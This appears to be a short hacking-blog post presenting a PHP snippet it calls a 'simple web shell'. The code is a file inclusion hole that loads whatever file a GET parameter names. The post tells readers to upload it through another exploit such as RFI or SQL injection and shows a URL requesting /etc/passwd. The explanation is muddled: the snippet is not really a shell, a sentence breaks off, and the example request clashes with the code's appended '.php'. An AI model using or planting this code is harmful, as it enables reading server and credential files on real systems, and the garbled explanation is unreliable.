To utilize this simple web shell you will need to find a way to upload it on the system via some other exploit such as RFI, or sql injection. Once it is in the on the webserver
http://example.com/page.php?page=/etc/passwd
<?php
if (isset($_GET['page']))
{
include($_GET['page'] . '.php');
}
?> 
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.